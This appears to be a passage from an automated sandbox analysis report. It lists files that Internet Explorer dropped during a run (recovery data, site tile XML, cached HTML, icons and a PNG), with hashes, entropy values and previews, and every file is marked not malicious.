SHA1:	EFA4B9C9DB2AD5EAF81BCC611D46411BCBC94F3A
SHA-256:	3D81FD8EDB5C16EE30738F03B27F68B6FAD2EE054355F7F60D17F16109558810
SHA-512:	23C3EA6AA1D8FEFA278ACF903E5C7AC4E531DBA654543C4C9CA424F9D2C423E5ED24455A5BDC6E5BBEC92114ED4962F0FDB824B044A99A38BBE914BA9338EBB2
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CB1D97FB-3FD1-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27376
Entropy (8bit):	1.8459177671326468
Encrypted:	false
SSDEEP:	192:r5ZiQk6ikaFjB2EkWlMEY6Q7fHCJwxQ7fHCJb7fN6A:rvPPbahwwmEvQbHzQbHAbN9
MD5:	0D9D10C31ACD463ECD18435C4ED76E3B
SHA1:	2487A3DE332AC513F118ED655065A5D5EAA3B934
SHA-256:	AABB3D9EED3EC8A1483F806D06EA56E7EC391FA804C6EA1906FA5B30BB68EC7E
SHA-512:	F37355B1A2D62305E33AB07AF4F58011B48A639845EAD0421065E4F9F0F26657382608360FF59FCA4DB40A7BA6E6EAB81610DCB0F645170AB877896E75BD2156
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F0C73B57-3FD1-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27356
Entropy (8bit):	1.8406900188448838
Encrypted:	false
SSDEEP:	96:roZcQk6uBS8zFjB2QkW+M5YullKkRllKOl0mA:roZcQk6ukcFjB2QkW+M5Yu/DR/Z0mA
MD5:	F96EA46A33EB38F4532FA5EFD4310154
SHA1:	338F6639DF50B3F93FA050661E82D4CD85A179E5
SHA-256:	EAF8DF1732523038C92C6890389E896A409BDF167128CF5770067F6241D31F8B
SHA-512:	7804EEF205EF493FBA99B4B8647F26FD03A52AC32770A7803D69F792BDB876FD5893AA1A3BA0763BD40E8E15FA83D2BE405F3175C4379066FFADA4C1BBABBA82
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F0C73B59-3FD1-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27864
Entropy (8bit):	1.8281919088202825
Encrypted:	false
SSDEEP:	48:IwdGcprIGwpaAG4pQMZGrapbSFrGQpBDOGHHpcIsTGUp8JOGzYpm5JYGopQvkDE5:rDZQQg6uBSFFjh2IkWgMTYSKRZRKRz7r
MD5:	1F2D9109C1876BED62363BFC1C36362E
SHA1:	07EF0FECEEFC703787F281B7070E5BE2615E2360
SHA-256:	C3BE17D413A23B4CE7141545E4C4C8E400FA26EA6ED3C61EE09CD69CE755215E
SHA-512:	DF8CCB432AB74B1B440931FD5BA9EBBD238EEE8C390BD6111546DC03141B98F65CA2EC6019A3AC13FE6D520536027A894609F1A94B2A563D1982ED11D6ABBB2F
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{F0C73B5B-3FD1-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	modified
Size (bytes):	27360
Entropy (8bit):	1.8435320469566123
Encrypted:	false
SSDEEP:	192:r0ZXQn6Rk8Fj02XkWlMYYqBN1gRBN1FN1TKA:rkA6C8hjDmYfBP4BPFPTt
MD5:	C7E1A51F1BD0C909440B25E6D1535EF3
SHA1:	D74826A8CFD76094D471D28176C98BC5C1F5A1AE
SHA-256:	933437E4AB319798730C9F8BF5E2318475EFCDB75E36BDC8DCB0EA5AD6A06839
SHA-512:	F5FE0BAE0002A317FEC3DDD9DFBCA321FA13940FD087F56C880167432526419480B735F715AFA456FE3FA0B9200CDBEB0C415813C2435C5071EA688D6EF04B69
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.036633489741866
Encrypted:	false
SSDEEP:	12:TMHdNMNxOE5NodNKnWimI002EtM3MHdNMNxOE5NodNKnWimI00ONVbkEtMb:2d6NxOZKSZHKd6NxOZKSZ7Qb
MD5:	5FF4FEB05335F7A1E8949DFDA01C513A
SHA1:	DAA720A96C1BDA14FBB565E5A8364FD05F6A3380
SHA-256:	07355F6214123AD7E067BA831278C30ACACB26DCE603EF8DC618144E47B35685
SHA-512:	89B56FFC580F11A3AEA01C3B98E23315FCA8B90C0E9AA396CACEED356FAD5E9046B7E1BBB22AE1AE50988F24BD89AA23677877B85ECA39C0B5A17BFA1AE894F2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.065215080131142
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kJo9KnWimI002EtM3MHdNMNxe2kJo9KnWimI00ONkak6EtMb:2d6Nxrj0SZHKd6Nxrj0SZ72a7b
MD5:	BF25FC977528E3E0FC8832AE9927E851
SHA1:	8F7729FA56EE875793E84CA5026558F10A49008A
SHA-256:	F817FA10F5922C9C98DF4FAF3193A6617115F99ECBFF88006CDA3193EA3FBD7B
SHA-512:	FCF943EAAEBD1B6455947163BCD627413573221DDB6ADBFD3DDD4305ACA4097A562B6F086DBBAD6507634981BD3B66B0EDD7B5F6FFEFA00E9B07F87D8BAE3099
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xa0627a03,0x01d6d3de</date><accdate>0xa0627a03,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xa0627a03,0x01d6d3de</date><accdate>0xa0627a03,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.066623639403125
Encrypted:	false
SSDEEP:	12:TMHdNMNxvL5NodNKnWimI002EtM3MHdNMNxvL5No+KnWimI00ONmZEtMb:2d6NxvIKSZHKd6NxvIRSZ7Ub
MD5:	C0E9345EB1ECC9FA5DD88EB8E7EBAE30
SHA1:	125128A0D71E086CB657B9A1953961920D3166BC
SHA-256:	17D7D07B5D729F3C229A4D0500D22C819FF15912124BA795197E698067D8F64A
SHA-512:	D49084E8D6801FA6361F46BA8EFF92F91889E6B4616589BD780CDE6FE6B403B132EEC1B7FD3312D536BEBABAE82EFA4272C7CEAB20621F2260F9A049BE3B6F11
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	648
Entropy (8bit):	5.059298622698848
Encrypted:	false
SSDEEP:	12:TMHdNMNxi4uNoUuNKnWimI002EtM3MHdNMNxi4uNoUuNKnWimI00ONd5EtMb:2d6NxMODESZHKd6NxMODESZ7njb
MD5:	6E790126C8EFC4467D256FFC36F8939F
SHA1:	26213E0E1B715EB786FA48516061B7F15CF3ABEC
SHA-256:	E8DCC94D99DE8B0365B7C9819D9F0ADDD2CDBAAC46A80214991FCBC583CE39C4
SHA-512:	0C7C514BBC8C69C86378D5FD05B4B4004A95FB939D9639341303E0A9E43AA101A8D846DAC1F714291E11279101BCECA235970CB852FD187CA2A4BF9BFBBA9746
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.088249518384024
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwao+KnWimI002EtM3MHdNMNxhGwao+KnWimI00ON8K075EtMb:2d6NxQIRSZHKd6NxQIRSZ7uKajb
MD5:	1574CC7D83A650FF98AA368533F8DAFC
SHA1:	0AF5058CAACEFDBADB508552D9D004C68D95050E
SHA-256:	8BAEE1CF495853231C68868750216D9D55946D4BC836BCC876E505A469973AE9
SHA-512:	42E4E0821F3FE8CE62A3CC21D9A7D49BA6E749C9F2694354BF18A4520BF1DD7FCEE81DFDF9EE84340BC2012B4E9FEF3071730A6954B718838AC0B1EABD14E3C3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa069a141,0x01d6d3de</date><accdate>0xa069a141,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.035437950077547
Encrypted:	false
SSDEEP:	12:TMHdNMNx0n5NodNKnWimI002EtM3MHdNMNx0n5NodNKnWimI00ONxEtMb:2d6Nx0cKSZHKd6Nx0cKSZ7Vb
MD5:	6DF8F955E2885046D2EEAF96465C7AAC
SHA1:	478968DAA96F2663BF4901C0B48F69209FA9B162
SHA-256:	A66B25D35FF2CBC3645DCDAA252C80AE5FD0554990C36B8823C2D48917006821
SHA-512:	3DC1AECFDC585165958F888A215A5153E034CC23B85C458F2659F8933A2D1D942EE5865CAA6435295DAFDC2966C64116F37B81A88098E908B3D90DB37324D794
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.07620844139945
Encrypted:	false
SSDEEP:	12:TMHdNMNxx5NodNKnWimI002EtM3MHdNMNxx5NodNKnWimI00ON6Kq5EtMb:2d6NxmKSZHKd6NxmKSZ7ub
MD5:	19756710DC1E1295AD36AFCD3EDE6AB6
SHA1:	C4D80E91392329B6CD322615F7041D94FB1C6728
SHA-256:	4300F027F37ED769FC6EEC6EB93712A3F73130776BF225A65A7FE6B8FC91D1C2
SHA-512:	FD9C6A93DDA33C06A9B54E487DE7EF85BC367DAC0F441D0252C97DC1CDC882C12480E6F9BE54EC89EBF2415B148C87DD864F995873A521F0064820EB046AECED
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xa0673eb6,0x01d6d3de</date><accdate>0xa0673eb6,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.063952043480215
Encrypted:	false
SSDEEP:	12:TMHdNMNxc4uNoUuNKnWimI002EtM3MHdNMNxc4uNoUuNKnWimI00ONVEtMb:2d6NxiODESZHKd6NxiODESZ71b
MD5:	ED9825120C76CA457FFF6DDC117D400A
SHA1:	7EC4101B7B84C1A614DB09B467CF24FF45A10749
SHA-256:	CCD0FC2242B74CE255381F6E0A01E96D533D5EE9C24F8F0A851EECDDA8145474
SHA-512:	4F04B8DF47F1DE2C7E9D8984FC320DDE4718CAAB98B2B5301B93D465929CC2F255545D5D9C0ED999F432FF29D7B6EDF9A9BE1DFF4A87460D2DE69D3805AC5EC2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.0450338260817436
Encrypted:	false
SSDEEP:	12:TMHdNMNxfn4uNoUuNKnWimI002EtM3MHdNMNxfn4uNoUuNKnWimI00ONe5EtMb:2d6NxvODESZHKd6NxvODESZ7Ejb
MD5:	A90D70938200FA28E7933D6DD30E7F0F
SHA1:	658BB2A8836EB14B555D5580F33D81C1F6E1F3B1
SHA-256:	74188EA6B664ADD9A6C8489F48F19331A743A84C7A67F3DAF6FD67F525100427
SHA-512:	A870B744D8B9DF2FE87466A4AF6705000ADD5B1D1E497F883F330119649C502DF3955E209FD6D4B017F018506EA288EE10C79A52D8B25936F8C0FD42848E0E9C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xa064dc64,0x01d6d3de</date><accdate>0xa064dc64,0x01d6d3de</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5656
Entropy (8bit):	4.130390002262069
Encrypted:	false
SSDEEP:	96:g0aWBom5zDlvV2rkG4zuAZMXJFG62q7mQP:gCBB5zZ0IG46AaXJFG6v7mi
MD5:	9C5EF3853AC75AEB0A9AE6375470D64F
SHA1:	8C534692B5146BC56F4872CC413EDB2985ADAC7B
SHA-256:	68714CB3732050560D3AFF05376F1D6A0FDDA8DC9E5AA05435FAB8E3F85202B3
SHA-512:	0E91EDF2A718360DA10A151169475020BCBC7A2279C0C6A4E1693E807BA9220D2038B00354E3854E1742D89F07B53564EF6B40B043BC5CAD8D20A145E5BA7CD7
Malicious:	false
Preview:	........".h.t.t.p.:././.r.o.s.a.d.a.l.k.i.n.g...x.y.z./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..s.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\AGlpBU[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	232884
Entropy (8bit):	5.999887471636028
Encrypted:	false
SSDEEP:	6144:qn+jaKLBJDzrkO32SewjX4dOn6RDE5025F878:q+j9L/kO3jeQX4w6RDyL5a78
MD5:	F653BEE495A51D0BB6462700A8717922
SHA1:	FD0BD83B76C1904D4046A49657F3244E4F1841A6
SHA-256:	0C91F4F38F71AF76044EB53A98AA4191BD543E18493C7FA90BA085474F9D6852
SHA-512:	DE1902F810424D0705D5D8FF43580BE90F447721A1B55BF20F0E3D9F7CCA57D362667B890E18F710F8CE6FDF1DE0CE286BA5183F4FB3D6B572E9B999199C9C42
Malicious:	false
Preview:	CwJmOcMwoyudEY8Z+Xw0ti+vCO4WpH9x0jVUvrxurNSMCo8NTY8JzBseqLvi9DJCGeOmmXV1J67ChE4rH6AF5Tr9g1+mBohMUZp6gueyPEV/panQmq6RS8QFvFDFrArMD/GBm9fhjNgbw5NzRp79KRL1IimyrYGxeLO/4Ndpleg07OZiojU1US6O6zIi8xdwVQAERGVaknwBggx0xqWjJ+FzjDGA4pG3RdHBAbcgmNToLxKB76KsWy7J4j+EA2fSf2faHEbgnm65HkSJjkUVpy51/w+WEVViQWHWH0yHDvbxQzb/st3cLh3D3ko02Qs1mCZTy4xcMSXvXUcvdv5p3b2OThR/hr2MNQT+akWvlMv8zJXn2IWs5x98OWYk65Hzv9FIp4VdKTNE+HSEeE/18sR9YY78zItvVhrz5s6wcJdvDh9oW8IRWh5wHoALJnqXkUsqEhI0Rv9wW20gF03Czzwi0B62CtZcdG5riWhJZNzTDdNMYoUQniMg8quxnnRM0EoLlFHfALMQU+4q8vC2BDF4uDxWw6Nl2onOh7HZNPRsnK8LotGyEcmXYXiUDfWOP468qducCKyclCsuv8O3j2HBlyTdaaCMQQl7qbKIa9y0KE+FYHso73x/6fqrskqYCcAY4ix7xKFUm/skTrlaCpYWysYvKuISvTpDbK/221RMjl/yM07RgIhVOZ1GbZ1itfnlNXhwcyWD3NbORWkqiwukJk9S/P0jLsclo71ISvemEpyYmVjizyBtDIOXnqhTH0ez44gVFiLyjCjS2aOB4uje52mDDAcp6ds4Io+9Fd7hfQsTess2yMbOq652C9b0zQHdNWWeOabwJnCNez+z8QcYyIlX1HgqVmYwsaKfs2SP/yLgpav0NKBqPpiXmPUnlsmchwE/8k/lo1DUuCwP0J8UoA6byJJd1RNUM84j8r55NYMgG6VYARe2rY4Msi6VmniVixgH07AAKarlaHG+6wI5O9st62x6mMV0drCh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	5430
Entropy (8bit):	4.0126861171462025
Encrypted:	false
SSDEEP:	96:n0aWBDm5zDlvV2rkG4zuAZMXJFG62q7mQ:nCBy5zZ0IG46AaXJFG6v7m
MD5:	F74755B4757448D71FDCB4650A701816
SHA1:	0BCBE73D6A198F6E5EBAFA035B734A12809CEFA6
SHA-256:	E78286D0F5DFA2C85615D11845D1B29B0BFEC227BC077E74CB1FF98CE8DF4C5A
SHA-512:	E0FB5F740D67366106E80CBF22F1DA3CF1D236FE11F469B665236EC8F7C08DEA86C21EC8F8E66FC61493D6A8F4785292CE911D38982DBFA7F5F51DADEBCC8725
Malicious:	false
Preview:	............ .h...&... .... .........(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..s...sK..r/..s3..sa..s...s...s!..s#..s..s...s...s...s...s...s...sy..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\robot[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 171 x 213, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	6327
Entropy (8bit):	7.917392761938663
Encrypted:	false
SSDEEP:	192:fqjwqVtaVHyEy9BWc2AwJ+3qg1f6WUBIT8mIKPNc93Y8Nm:Yk3WBkAkg1CWUCwmIKS93O
MD5:	4C9ACF280B47CEF7DEF3FC91A34C7FFE
SHA1:	C32BB847DAF52117AB93B723D7C57D8B1E75D36B
SHA-256:	5F9FC5B3FBDDF0E72C5C56CDCFC81C6E10C617D70B1B93FBE1E4679A8797BFF7
SHA-512:	369D5888E0D19B46CB998EA166D421F98703AEC7D82A02DC7AE10409AEC253A7CE099D208500B4E39779526219301C66C2FD59FE92170B324E70CF63CE2B429C
Malicious:	false
Preview:	.PNG........IHDR...................WPLTE...z..z........2........W..{..V........z.....2..3.....V..2..................W.....>`......tRNS.............................Y..j....IDATx....BcI.@A.s..HX....k.0c...T.?n./.~....b....GM.Gu.c...?.{5.5...4.'.o<...i.O.n<.f..?).g.&..8.E4..tl.4.G.o4.....'.....\......._ ...../.~..<......../.~^.}...?...~...Z../.~.]._ ...I. .Q.Y....YQu..i..4.._ \|S...A.-.-h...9...o...k.....9o..?N.U,../+...Z.y...nbMu....4O.7>..Y.-L=J..q..`.B^{4~.p...bR.j.....Gq=..]&..7Y)G6.....A.h`i]...Pd.'.7....9.2...2x.........&..a0N..By.Y.C..S......nR.-..A[5.....\|.p...+v...d\e..]Yq;.&q0..F.c.....p3.&.`..!q..}...k.g5n#........NG-.9...C..[.7.n.v..u......{o.C&n!.(.G7.JA.'6..{(<....p....:..!=..1.f.."..n.8....~o..N.3l..p.[..........r..6..z...(.g1qA.[....q.v+..&...B{.I.\..-.....S.y&.......J.Wn!\|D.....+...y.....9.......> .j......{.....K\X.n!..e.I.+'...j...-pA.[..2...8g.DO.#.?p.. ....-.w5.d......4....n..!q..=..Gu.X..O.........sN.h.q..n!..qP

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\A6Pn[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2404
Entropy (8bit):	5.988045560444535
Encrypted:	false
SSDEEP:	48:UsuFbqLGnJpfT3MN6wGMQbxMzFSAuGQ5RmA5ngTHzxAZt4YBkoX8bUWFZH:qFdJpfbMEHxfEQ5R3MzeZdBnX8Jx
MD5:	401AF9EB95D581473470D429C23EF8BA
SHA1:	0C6C6FB39B2F811B224DC68BACCB8939DCD87C3B
SHA-256:	49C07BD919280ACC3919C422BEFAF1EE260F0EB74FDEBEE843ECD5EC2FB98E12
SHA-512:	D23449607D1793C6E2E3A5E02B323DDB55E1BACD71E49B4AABA1BFF18FA9FBDCA2FD5039D0A52DA1A0D1A88FFAB707F9987CAC0BA1383C1A76562DEEFD61DB59
Malicious:	false
